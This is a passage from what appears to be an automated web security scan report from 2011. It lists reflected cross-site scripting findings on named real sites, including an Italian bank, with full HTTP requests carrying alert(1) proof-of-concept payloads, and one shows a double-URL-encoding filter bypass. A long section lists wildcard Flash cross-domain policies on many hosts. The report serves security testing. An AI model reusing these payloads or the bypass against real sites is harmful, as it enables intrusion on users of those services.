Date: Mon, 02 May 2011 22:27:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96631

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=7e58f"><script>alert(1)</script>ec94702f118" />
...[SNIP]...

4.52. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4664%2522%253balert%25281%2529%252f%252fc4f26dbd9fc was submitted in the Referer HTTP header. This input was echoed as a4664";alert(1)//c4f26dbd9fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a4664%2522%253balert%25281%2529%252f%252fc4f26dbd9fc

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:27:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96589

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
b="";addthis_onload = [ function() { document.getElementById('filt').focus(); } ];addthis_url="http://www.google.com/search?hl=en&q=a4664%2522%253balert%25281%2529%252f%252fc4f26dbd9fc";addthis_title="a4664";alert(1)//c4f26dbd9fc - 1 search";
var services = { '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97abi':"A97abi", 'addio':"Add.io", 'adfty':"Adfty"
...[SNIP]...

4.53. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload a8199<script>alert(1)</script>9d3863d50ae was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a8199<script>alert(1)</script>9d3863d50ae

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:27:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96613

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
</script>9d3863d50ae";addthis_title="a8199<script>alert(1)</script>9d3863d50ae - 1 search";
var services = { '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97abi':"A97abi", 'addio':"Add.io", 'adfty':"Adfty"
...[SNIP]...

4.54. http://www.autostrade.it/autostrade/jsonBridge [JSESSIONID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autostrade.it
Path:   /autostrade/jsonBridge

Issue detail

The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload 416eb<script>alert(1)</script>ad99e449219 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /autostrade/jsonBridge?srvc=homecams&op=tlcTmb&codArea=ALL&ntlc=30 HTTP/1.1
Host: www.autostrade.it
Proxy-Connection: keep-alive
Referer: http://www.autostrade.it/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=99A6B622412B24DBC05018F5AF4B46BC.bau10416eb<script>alert(1)</script>ad99e449219

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:15:23 GMT
Server: Autostrade
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
x-wily-info: Clear guid=B2C7B7DB7F000001770971923379B679
x-wily-servlet: Clear appServerIp=127.0.0.1&agentName=bau18&servletName=JsonBridgeServlet&agentHost=n0611733&agentProcess=JBoss
Cache-Control: no-store, no-cache, must-revalidate
Set-Cookie: JSESSIONID=99A6B622412B24DBC05018F5AF4B46BC.bau10416eb<script>alert(1)</script>ad99e449219; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: application/json;charset=UTF-8
Content-Language: it
Content-Length: 4318

{"token":"99A6B622412B24DBC05018F5AF4B46BC.bau10416eb<script>alert(1)</script>ad99e4492191304374524694","tlcs":[{"tlc":"26969","thumb":"/autostrade/FrameTelecamera?tipo=T&tlc=26969","description":"A1 Diramazione Roma nord - GRA Km. 09,9 Castelnuovo di Porto"},{"tlc":"38914","thumb":"/autos
...[SNIP]...

4.55. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do [ultimeTrePagine cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/2l/do/aol/wbwsPUaol0.do

Issue detail

The value of the ultimeTrePagine cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60622'-alert(1)-'66d057b537f was submitted in the ultimeTrePagine cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw&OBS_KEY=pro_wbn_apri_conto_webank HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: http://www.webank.it/lndpage/promo321.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ultimeTrePagine=*!*!*!*:*!*!*!*:nav_pub_wb_conti_nw!pro_wbn_apri_conto_webank!*!*60622'-alert(1)-'66d057b537f; webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:11:33 GMT
Server: Apache/2.2.3 (Red Hat)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 26787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script type="text/javascript">
           document.cookie = 'ultimeTrePagine='+'*!*!*!*:*!*!*!*:nav_pub_wb_conti_nw!pro_wbn_apri_conto_webank!*!*60622'-alert(1)-'66d057b537f';
           var srvTs = '1304381493725';
       
           var hp_visual = 'null';
   
       </script>
...[SNIP]...

4.56. https://www.webank.it/webankpub/wb/fpServizi.do [ultimeTrePagine cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/fpServizi.do

Issue detail

The value of the ultimeTrePagine cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cad1b'-alert(1)-'d7d638a9938 was submitted in the ultimeTrePagine cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webankpub/wb/fpServizi.do?tabId=nav_pub_wb_serveaiuto_nw&OBS_KEY=pro_wbn_serve_aiuto HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: https://www.webank.it/webankpub/wb/home.do?tabId=nav_pub_wb_home_nw&OBS_KEY=nav_pub_wb_home_nw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ultimeTrePagine=*!*!*!*:*!*!*!*:nav_pub_wb_home_nw!nav_pub_wb_home_nw!*!*cad1b'-alert(1)-'d7d638a9938; openedLogin=true; webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:12:44 GMT
Server: Apache/2.2.3 (Red Hat)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 45064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script type="text/javascript">
           document.cookie = 'ultimeTrePagine='+'*!*!*!*:nav_pub_wb_home_nw!nav_pub_wb_home_nw!*!*cad1b'-alert(1)-'d7d638a9938:nav_pub_wb_serveaiuto_nw!pro_wbn_serve_aiuto!*!*';
           var srvTs = '1304381564979';
       
           var hp_visual = 'null';
   
       </script>
...[SNIP]...

5. Flash cross-domain policy
There are 41 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad-emea.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 18:22:36 GMT
Date: Mon, 02 May 2011 22:45:44 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.2. http://ad78.neodatagroup.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad78.neodatagroup.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad78.neodatagroup.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
Last-Modified: Mon, 12 Oct 2009 10:53:26 GMT
ETag: "5d8989-c9-475babd3b7580"
Accept-Ranges: bytes
Content-Length: 201
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 22:17:39 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.3. http://adlev.neodatagroup.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adlev.neodatagroup.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adlev.neodatagroup.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:21:47 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
Last-Modified: Mon, 12 Oct 2009 10:53:26 GMT
ETag: "5d8989-c9-475babd3b7580"
Accept-Ranges: bytes
Content-Length: 201
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 22:21:47 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.4. http://bs.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 22:33:24 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.5. http://cdn1.eyewonder.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn1.eyewonder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn1.eyewonder.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 07 Nov 2008 23:34:25 GMT
ETag: "4418f35e3141c91:139e"
Content-Length: 195
Content-Type: text/xml
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
p3p: policyref="/200125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
Cache-Control: max-age=2828
Expires: Mon, 02 May 2011 23:04:13 GMT
Date: Mon, 02 May 2011 22:17:05 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://cdn.eyewonder.com-->
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

5.6. http://cdn4.eyewonder.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn4.eyewonder.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:16:40 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.7. http://documenti.camera.it/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://documenti.camera.it
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: documenti.camera.it

Response

HTTP/1.0 200 OK
Cache-Control: No-Cache
Pragma: No-Cache
Content-Length: 1225
Content-Type: text/xml
Last-Modified: Tue, 25 Jan 2011 14:36:58 GMT
Accept-Ranges: bytes
ETag: "371bff519dbccb1:16c7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 22:24:34 GMT
X-Cache: MISS from ns1.camera.it
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
<allow-access-from domain="http://www.camera.it" />
   <allow-access-from domain="http://leg16.camera.it" />
   <allow-access-from domain="www.camera.it" />
   <allow-access-from domain="*.camera.it" />
   <allow-access-from domain="http://nuovo.camera.it" />
   <allow-access-from domain="nuovo.camera.it" />
   <allow-access-from domain="*.nuovo.camera.it" />
   <allow-access-from domain="http://xm.intra.camera.it" />
   <allow-access-from domain="*.xm.intra.camera.it" />
   <allow-access-from domain="xm.intra.camera.it" />
   <allow-access-from domain="http://xmtenderinter.intra.camera.it" />
   <allow-access-from domain="*.xmtenderinter.intra.camera.it" />
   <allow-access-from domain="xmtenderinter.intra.camera.it" />
   <allow-access-from domain="http://nuovo.intra.camera.it" />
   <allow-access-from domain="*.nuovo.intra.camera.it" />
   <allow-access-from domain="nuovo.intra.camera.it" />
...[SNIP]...

5.8. http://ds.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 22:33:24 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.9. http://elstatic.weborama.fr/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://elstatic.weborama.fr
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: elstatic.weborama.fr

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/xml
Date: Mon, 02 May 2011 23:05:02 GMT
ETag: "1171997018"
Expires: Mon, 09 May 2011 23:05:02 GMT
Last-Modified: Thu, 13 Dec 2007 13:37:01 GMT
Server: ECAcc (dca/53CF)
X-Cache: HIT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.10. https://eprocurement.eni.it/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://eprocurement.eni.it
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: eprocurement.eni.it

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Last-Modified: Wed, 23 Mar 2011 10:31:45 GMT
Accept-Ranges: bytes
ETag: "1735e18145e9cb1:12e6"
Server: Microsoft-IIS/6.0
Date: Mon, 02 May 2011 22:24:14 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.11. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 02 May 2011 02:36:42 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 70867
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.12. http://ieo.solution.weborama.fr/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ieo.solution.weborama.fr
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ieo.solution.weborama.fr

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:04:57 GMT
Server: Apache
Last-Modified: Mon, 20 Oct 2008 13:27:23 GMT
ETag: "2a8005-6c-459af467404c0"
Accept-Ranges: bytes
Content-Length: 108
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.13. http://media.fastclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:16:16 GMT
Server: Apache/2.2.4 (Unix)
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 202
Keep-Alive: timeout=5, max=19978
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.14. http://metrics.ilsole24ore.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:43 GMT
Server: Omniture DC/2.0.0
xserver: www313
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.15. http://mfr.247realmedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mfr.247realmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mfr.247realmedia.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:16:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT
ETag: "3fd213-d0-4436057df0e40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_n1efm_qppm_iuuq=ffffffff09097b8445525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

5.16. http://omniture.virgilio.it/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://omniture.virgilio.it
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omniture.virgilio.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:16:17 GMT
Server: Omniture DC/2.0.0
xserver: www13
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.17. http://paginebianche.ilsole24ore.com/crossdomain.xml

Summary

